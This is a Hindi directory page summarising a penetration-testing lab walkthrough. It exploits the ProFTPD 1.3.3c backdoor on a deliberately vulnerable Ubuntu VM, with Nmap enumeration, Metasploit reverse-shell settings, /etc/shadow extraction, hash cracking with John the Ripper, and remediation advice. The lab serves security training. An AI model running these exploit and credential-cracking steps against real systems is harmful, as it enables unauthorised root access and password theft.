Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Offensive-lab-2 — एक असुरक्षित Ubuntu VM पर पेनेट्रेशन परीक्षण वॉकथ्रू। ProFTPD 1.3.3c बैकडोर (CVE-2010-4221) का शोषण करके रूट एक्सेस प्राप्त किया और फ्लैग पर कब्जा किया। इसमें Nmap एन्यूमरेशन, Metasploit पेलोड सेटअप, और उपयोगकर्ता हैश क्रैकिंग (John the Ripper) शामिल है। | Kitploit
उपकरण/GitHubGitHub/mafiosohack/offensive-lab-2
पासवर्ड क्रैकिंगटोहीशोषण फ्रेमवर्कपोर्ट स्कैनिंगभेद्यता विश्लेषणशोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लर्निंग और शिक्षा
लैब और अभ्यास
GitHubmafiosohack/offensive-lab-2

Offensive-lab-2

एक असुरक्षित Ubuntu VM पर पेनेट्रेशन परीक्षण वॉकथ्रू। ProFTPD 1.3.3c बैकडोर (CVE-2010-4221) का शोषण करके रूट एक्सेस प्राप्त किया और फ्लैग पर कब्जा किया। इसमें Nmap एन्यूमरेशन, Metasploit पेलोड सेटअप, और उपयोगकर्ता हैश क्रैकिंग (John the Ripper) शामिल है।

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

Offensive security Lab : ProFTPD 1.3.3c बैकडोर एक्सप्लॉइट (रूट फ्लैग)

  1. परिचय और उद्देश्य

यह रिपोर्ट एक कमजोर Linux वर्चुअल मशीन (VM) पर किए गए पैनेट्रेशन परीक्षण का विवरण देती है, जिसमें एक उच्च-जोखिम वाली सेवा भेद्यता की पहचान करने पर ध्यान केंद्रित किया गया है जिसने तत्काल रूट एक्सेस की अनुमति दी।

विवरणमान
लक्ष्य IP पता[ 192.168.222.130]
हमलावर IP पता (LHOST)[ 192.168.222.128]
लक्ष्य OSUbuntu 4ubuntu2.2 (Linux Kernel 3.x)
उद्देश्यरूट-स्तर शेल प्राप्त करें और फ्लैग फ़ाइल पुनर्प्राप्त करें।
  1. प्रारंभिक एन्यूमरेशन और भेद्यता पहचान

प्रारंभिक टोही में खुले पोर्ट और सेवा संस्करणों की पहचान करने के लिए Nmap का उपयोग करके सेवा स्कैन शामिल था।

कमांड:

root@kitploit:~
sudo nmap -sS -sV 192.168.222.130

मुख्य निष्कर्ष: | पोर्ट | सेवा | संस्करण | जोखिम | | :--- | :--- | :--- | :--- | 21/tcp | ftp | ProFTPD 1.3.3c | गंभीर (शोषण योग्य बैकडोर) | | 22/tcp | ssh | OpenSSH 7.2p2 | कम (मानक सेवा) | | 80/tcp | http | Apache httpd 2.4.18 | कम (कोई स्पष्ट वेब भेद्यता नहीं मिली) |

बाद के भेद्यता स्क्रिप्ट स्कैन ने FTP सेवा के भीतर एक अत्यधिक गंभीर बैकडोर के अस्तित्व की पुष्टि की। Nmap स्क्रिप्ट आउटपुट ने स्पष्ट रूप से रूट उपयोगकर्ता के रूप में कमांड निष्पादन दिखाया:

| ftp-proftpd-backdoor: | This installation has been backdoored. | Command: id |_ Results: uid=0(root) gid=0(root) groups=0(root)...

  1. शोषण और रूट शेल प्राप्ति

पुष्टि किए गए ProFTPD बैकडोर का लाभ उठाने के लिए Metasploit Framework का उपयोग किया गया।

एक्सप्लॉइट चरण:

  • Metasploit लॉन्च करें: msfconsole
  • एक्सप्लॉइट मॉड्यूल चुनें: use exploit/unix/ftp/proftpd_133c_backdoor
  • विकल्प सेट करें:

Bash

set RHOSTS 192.168.222.130 set PAYLOAD cmd/unix/reverse set LHOST 192.168.222.128

परिणाम: एक कमांड शेल सत्र सफलतापूर्वक स्थापित किया गया, जिससे तुरंत रूट विशेषाधिकार (uid=0) प्राप्त हुए।

  1. पोस्ट-एक्सप्लॉइटेशन और फ्लैग प्राप्ति

क्रेडेंशियल हार्वेस्टिंग

सिस्टम के उपयोगकर्ता हैश को पोस्ट-एक्सप्लॉइटेशन विश्लेषण के लिए /etc/shadow से निकाला गया। उपयोगकर्ता marlinspike के हैश को John the Ripper का उपयोग करके सफलतापूर्वक क्रैक किया गया।

प्रयुक्त कमांड (हमलावर मशीन पर):

Bash

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

क्रैक किया गया क्रेडेंशियल:

उपयोगकर्ता: marlinspike

पासवर्ड: marlinspike

  1. सुधार अनुशंसाएँ

समझौता की गई FTP सेवा के कारण सिस्टम की सुरक्षा स्थिति अत्यंत कमजोर है। सिस्टम को सुरक्षित करने के लिए तत्काल कदम उठाए जाने चाहिए:

  • तत्काल पैच/अपग्रेड: ProFTPD सेवा को ज्ञात बैकडोर और संबंधित CVE को ठीक करने के लिए तुरंत पैच या सुरक्षित संस्करण (1.3.3g से अधिक) में अपग्रेड किया जाना चाहिए।
  • सेवा निष्कासन: यदि सिस्टम के कार्य के लिए FTP आवश्यक नहीं है, तो सेवा को पूरी तरह से हटा दिया जाना चाहिए।
  • फ़ायरवॉल: पोर्ट 21 तक बाहरी पहुंच को अवरुद्ध करने के लिए सख्त फ़ायरवॉल नियम (iptables/ufw) लागू करें।
  • सुरक्षित शेल कॉन्फ़िगरेशन: रूट लॉगिन अक्षम करने और कुंजी-आधारित प्रमाणीकरण लागू करने के लिए SSH कॉन्फ़िगरेशन की समीक्षा करें।

निष्पादित करें: exploit

टूल डाउनलोड करें